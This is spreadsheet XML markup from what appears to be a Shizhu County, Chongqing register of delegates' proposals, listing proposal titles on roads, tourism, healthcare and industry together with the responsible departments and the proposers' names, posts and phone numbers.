        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于将龙潭至丰都太平坝（丰都界）公路建设项目纳入</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">2021</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">年重点项目库予以实施的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">关于提升石柱县整体形象的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县交通局、县农业农村委、县文化旅游委</t>
  </si>
  <si>
    <t xml:space="preserve">马红星</t>
  </si>
  <si>
    <t xml:space="preserve">沙子镇党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快建设七曜山国家地质公园卢家坝子核心景区的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县林业局、县农旅集团</t>
  </si>
  <si>
    <t xml:space="preserve">关于支持打造以沙子动车站为核心的“大黄水门户功能带”建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委
县文化旅游委
县规划自然资源局</t>
  </si>
  <si>
    <t xml:space="preserve">马红星
潘  涛</t>
  </si>
  <si>
    <t xml:space="preserve">沙子镇党委书记
沙子镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于恢复兴隆村人行便桥的建议</t>
  </si>
  <si>
    <t xml:space="preserve">13983575368
13638205559</t>
  </si>
  <si>
    <t xml:space="preserve">张明健</t>
  </si>
  <si>
    <t xml:space="preserve">重庆万力联兴实业集团董事长</t>
  </si>
  <si>
    <t xml:space="preserve">关于提高营商环境，完成工业配套设施建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于加宽太白桥，缓解交通压力，建设畅通石柱的建议</t>
  </si>
  <si>
    <t xml:space="preserve">刘代德</t>
  </si>
  <si>
    <t xml:space="preserve">县人民医院医务科科长</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于全面推进健康石柱建设，进一步深化医药卫生改革</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="方正仿宋_GBK"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">,</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">提高医务人员待遇和社会地位的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">县委编办、县人力社保局、县财政局</t>
  </si>
  <si>
    <t xml:space="preserve">刘尚龙</t>
  </si>
  <si>
    <t xml:space="preserve">重庆长旺集团有限责任公司
董事长</t>
  </si>
  <si>
    <t xml:space="preserve">关于培育支柱产业、壮大县域经济，打通融资通道的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于壮大实体经济，设立支柱产业发展基金的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县国资事务中心</t>
  </si>
  <si>
    <t xml:space="preserve">杨地荣</t>
  </si>
  <si>
    <t xml:space="preserve">金竹乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于上升村乡村振兴楠竹产业项目继续纳入财政补助管护的建议</t>
  </si>
  <si>
    <t xml:space="preserve">马  瑜</t>
  </si>
  <si>
    <t xml:space="preserve">民革石柱支部专职副主委</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强对“手工产品”监管的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于我县举办“康养大会”的建议</t>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12"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="方正黑体_GBK"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="20"/>
      <color rgb="FF000000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="20"/>
      <color rgb="FF000000"/>
      <name val="方正小标宋_GBK"/>
      <family val="0"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Noto Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="方正仿宋_GBK"/>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0" fillId="0" borderId="0" xfId="21"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norma1"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C8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8.99609375" defaultRowHeight="14.25" zeroHeight="false" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col collapsed="false" customWidth="true" hidden="true" outlineLevel="0" max="1" min="1" style="1" width="19.24"/>
    <col collapsed="false" customWidth="true" hidden="true" outlineLevel="0" max="2" min="2" style="0" width="6.62"/>
    <col collapsed="false" customWidth="true" hidden="true" outlineLevel="0" max="3" min="3" style="2" width="31.87"/>
    <col collapsed="false" customWidth="false" hidden="true" outlineLevel="0" max="6" min="4" style="1" width="8.99"/>
    <col collapsed="false" customWidth="false" hidden="false" outlineLevel="0" max="257" min="7" style="1" width="8.99"/>
  </cols>
  <sheetData>
    <row r="1" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C1" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C2" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="3" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C3" s="3" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="4" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C4" s="2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="5" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C5" s="2" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="6" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C6" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="7" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C7" s="2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="8" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C8" s="2" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="9" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C9" s="2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C10" s="3" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="11" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C11" s="3" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="12" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C12" s="3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="13" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C13" s="2" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="14" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C14" s="3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="15" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C15" s="3" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="16" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C16" s="3" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C17" s="3" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="18" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C18" s="3" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="19" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C19" s="3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="20" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C20" s="3" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="21" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C21" s="2" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="22" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C22" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="23" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C23" s="3" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="24" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C24" s="3" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="25" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C25" s="2" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="26" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C26" s="3" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="27" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C27" s="3" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="28" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C28" s="3" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="29" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C29" s="3" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="30" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C30" s="3" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="31" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C31" s="3" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="32" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C32" s="3" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="33" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C33" s="3" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="34" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C34" s="3" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="35" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C35" s="2" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="36" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C36" s="3" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="37" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C37" s="2" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="38" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C38" s="2" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="39" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C39" s="2" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="40" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C40" s="2" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="41" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C41" s="2" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="42" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C42" s="2" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="43" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C43" s="3" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="44" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C44" s="3" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="45" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C45" s="3" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="46" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C46" s="2" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="47" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C47" s="2" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="48" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C48" s="2" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="49" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C49" s="2" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="50" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C50" s="2" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="51" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C51" s="3" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="52" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C52" s="2" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="53" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C53" s="3" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="54" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C54" s="3" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="55" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C55" s="3" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="56" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C56" s="3" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="57" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C57" s="3" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="58" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C58" s="3" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="59" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C59" s="3" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="60" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C60" s="3" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="61" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C61" s="3" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="62" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C62" s="3" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="63" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C63" s="2" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="64" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C64" s="2" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="65" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C65" s="2" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="66" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C66" s="2" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="67" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C67" s="2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="68" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C68" s="3" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="69" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C69" s="3" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="70" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C70" s="3" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="71" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C71" s="3" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="72" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C72" s="3" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="73" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C73" s="3" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="74" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C74" s="2" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="75" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C75" s="3" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="76" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C76" s="3" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="77" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C77" s="2" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="78" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C78" s="3" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="79" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C79" s="3" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="80" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C80" s="2" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="81" customFormat="false" ht="15.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C81" s="3" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="82" customFormat="false" ht="14.25" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="C82" s="2" t="s">
        <v>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P47" activeCellId="0" sqref="P47"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.99609375" defaultRowHeight="15.75" zeroHeight="false" outlineLevelRow="0" outlineLevelCol="0"/>
  <cols>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="1" min="1" style="4" width="3.87"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="2" min="2" style="5" width="8.36"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="3" min="3" style="5" width="19.12"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="4" min="4" style="5" width="27.37"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="5" min="5" style="6" width="10.74"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="6" min="6" style="7" width="12.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="7" min="7" style="7" width="14.12"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="8" min="8" style="7" width="15.24"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="9" min="9" style="8" width="7.5"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="10" min="10" style="8" width="5.99"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="11" min="11" style="7" width="5.99"/>
    <col collapsed="false" customWidth="true" hidden="false" outlineLevel="0" max="12" min="12" style="7" width="5.87"/>
    <col collapsed="false" customWidth="false" hidden="false" outlineLevel="0" max="257" min="13" style="5" width="8.99"/>
  </cols>
  <sheetData>
    <row r="1" customFormat="false" ht="18.75" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A1" s="9" t="s">
        <v>74</v>
      </c>
      <c r="B1" s="9"/>
    </row>
    <row r="2" customFormat="false" ht="25.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="B2" s="10" t="s">
        <v>75</v>
      </c>
      <c r="C2" s="10"/>
      <c r="D2" s="10"/>
      <c r="E2" s="10"/>
      <c r="F2" s="10"/>
      <c r="G2" s="10"/>
      <c r="H2" s="10"/>
      <c r="I2" s="10"/>
      <c r="J2" s="10"/>
      <c r="K2" s="10"/>
      <c r="L2" s="10"/>
    </row>
    <row r="3" customFormat="false" ht="42.75" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A3" s="11" t="s">
        <v>76</v>
      </c>
      <c r="B3" s="11" t="s">
        <v>77</v>
      </c>
      <c r="C3" s="11" t="s">
        <v>78</v>
      </c>
      <c r="D3" s="11" t="s">
        <v>79</v>
      </c>
      <c r="E3" s="11" t="s">
        <v>80</v>
      </c>
      <c r="F3" s="12" t="s">
        <v>81</v>
      </c>
      <c r="G3" s="12" t="s">
        <v>82</v>
      </c>
      <c r="H3" s="12" t="s">
        <v>83</v>
      </c>
      <c r="I3" s="12" t="s">
        <v>84</v>
      </c>
      <c r="J3" s="12" t="s">
        <v>85</v>
      </c>
      <c r="K3" s="12" t="s">
        <v>86</v>
      </c>
      <c r="L3" s="12" t="s">
        <v>87</v>
      </c>
    </row>
    <row r="4" customFormat="false" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A4" s="13" t="n">
        <v>1</v>
      </c>
      <c r="B4" s="14" t="s">
        <v>88</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>89</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>90</v>
      </c>
      <c r="E4" s="14" t="s">
        <v>91</v>
      </c>
      <c r="F4" s="13" t="n">
        <v>18717051188</v>
      </c>
      <c r="G4" s="14" t="s">
        <v>92</v>
      </c>
      <c r="H4" s="14"/>
      <c r="I4" s="15"/>
      <c r="J4" s="15"/>
      <c r="K4" s="14"/>
      <c r="L4" s="14"/>
    </row>
    <row r="5" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A5" s="13" t="n">
        <v>2</v>
      </c>
      <c r="B5" s="14" t="s">
        <v>93</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>89</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>94</v>
      </c>
      <c r="E5" s="14" t="s">
        <v>95</v>
      </c>
      <c r="F5" s="13" t="n">
        <v>18717051188</v>
      </c>
      <c r="G5" s="14" t="s">
        <v>92</v>
      </c>
      <c r="H5" s="14"/>
      <c r="I5" s="15"/>
      <c r="J5" s="15"/>
      <c r="K5" s="14"/>
      <c r="L5" s="14"/>
    </row>
    <row r="6" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A6" s="13" t="n">
        <v>3</v>
      </c>
      <c r="B6" s="14" t="s">
        <v>93</v>
      </c>
      <c r="C6" s="14" t="s">
        <v>89</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>96</v>
      </c>
      <c r="E6" s="14" t="s">
        <v>95</v>
      </c>
      <c r="F6" s="13" t="n">
        <v>18717051188</v>
      </c>
      <c r="G6" s="14" t="s">
        <v>97</v>
      </c>
      <c r="H6" s="14"/>
      <c r="I6" s="15"/>
      <c r="J6" s="15"/>
      <c r="K6" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L6" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="7" s="6" customFormat="true" ht="54" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A7" s="13" t="n">
        <v>4</v>
      </c>
      <c r="B7" s="14" t="s">
        <v>93</v>
      </c>
      <c r="C7" s="14" t="s">
        <v>89</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>100</v>
      </c>
      <c r="E7" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F7" s="13" t="n">
        <v>18717051188</v>
      </c>
      <c r="G7" s="14" t="s">
        <v>102</v>
      </c>
      <c r="H7" s="14" t="s">
        <v>103</v>
      </c>
      <c r="I7" s="14" t="s">
        <v>98</v>
      </c>
      <c r="J7" s="14" t="s">
        <v>104</v>
      </c>
      <c r="K7" s="14"/>
      <c r="L7" s="14"/>
    </row>
    <row r="8" s="6" customFormat="true" ht="43.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A8" s="13" t="n">
        <v>5</v>
      </c>
      <c r="B8" s="14" t="s">
        <v>105</v>
      </c>
      <c r="C8" s="14" t="s">
        <v>106</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>107</v>
      </c>
      <c r="E8" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F8" s="13" t="n">
        <v>13908273017</v>
      </c>
      <c r="G8" s="14" t="s">
        <v>108</v>
      </c>
      <c r="H8" s="14" t="s">
        <v>109</v>
      </c>
      <c r="I8" s="15"/>
      <c r="J8" s="15"/>
      <c r="K8" s="14"/>
      <c r="L8" s="14"/>
    </row>
    <row r="9" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A9" s="13" t="n">
        <v>6</v>
      </c>
      <c r="B9" s="14" t="s">
        <v>105</v>
      </c>
      <c r="C9" s="14" t="s">
        <v>106</v>
      </c>
      <c r="D9" s="15" t="s">
        <v>110</v>
      </c>
      <c r="E9" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F9" s="13" t="n">
        <v>13908273017</v>
      </c>
      <c r="G9" s="14" t="s">
        <v>111</v>
      </c>
      <c r="H9" s="14" t="s">
        <v>112</v>
      </c>
      <c r="I9" s="15"/>
      <c r="J9" s="15"/>
      <c r="K9" s="14" t="s">
        <v>98</v>
      </c>
      <c r="L9" s="16" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="10" s="6" customFormat="true" ht="27" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A10" s="13" t="n">
        <v>7</v>
      </c>
      <c r="B10" s="14" t="s">
        <v>105</v>
      </c>
      <c r="C10" s="14" t="s">
        <v>106</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>113</v>
      </c>
      <c r="E10" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F10" s="13" t="n">
        <v>13908273017</v>
      </c>
      <c r="G10" s="14" t="s">
        <v>92</v>
      </c>
      <c r="H10" s="14" t="s">
        <v>114</v>
      </c>
      <c r="I10" s="15"/>
      <c r="J10" s="15"/>
      <c r="K10" s="14"/>
      <c r="L10" s="14"/>
    </row>
    <row r="11" s="6" customFormat="true" ht="28.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A11" s="13" t="n">
        <v>8</v>
      </c>
      <c r="B11" s="14" t="s">
        <v>115</v>
      </c>
      <c r="C11" s="14" t="s">
        <v>116</v>
      </c>
      <c r="D11" s="15" t="s">
        <v>117</v>
      </c>
      <c r="E11" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F11" s="13" t="n">
        <v>13996909607</v>
      </c>
      <c r="G11" s="14" t="s">
        <v>108</v>
      </c>
      <c r="H11" s="14" t="s">
        <v>118</v>
      </c>
      <c r="I11" s="15"/>
      <c r="J11" s="15"/>
      <c r="K11" s="14"/>
      <c r="L11" s="14"/>
    </row>
    <row r="12" s="6" customFormat="true" ht="40.5" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A12" s="13" t="n">
        <v>9</v>
      </c>
      <c r="B12" s="14" t="s">
        <v>115</v>
      </c>
      <c r="C12" s="14" t="s">
        <v>119</v>
      </c>
      <c r="D12" s="15" t="s">
        <v>120</v>
      </c>
      <c r="E12" s="14" t="s">
        <v>101</v>
      </c>
      <c r="F12" s="13" t="n">
        <v>13996909607</v>
      </c>
      <c r="G12" s="14" t="s">
        <v>121</v>
      </c>
      <c r="H12" s="14" t="s">
        <v>122</v>
      </c>
      <c r="I12" s="15"/>
      <c r="J12" s="15"/>
      <c r="K12" s="14"/>
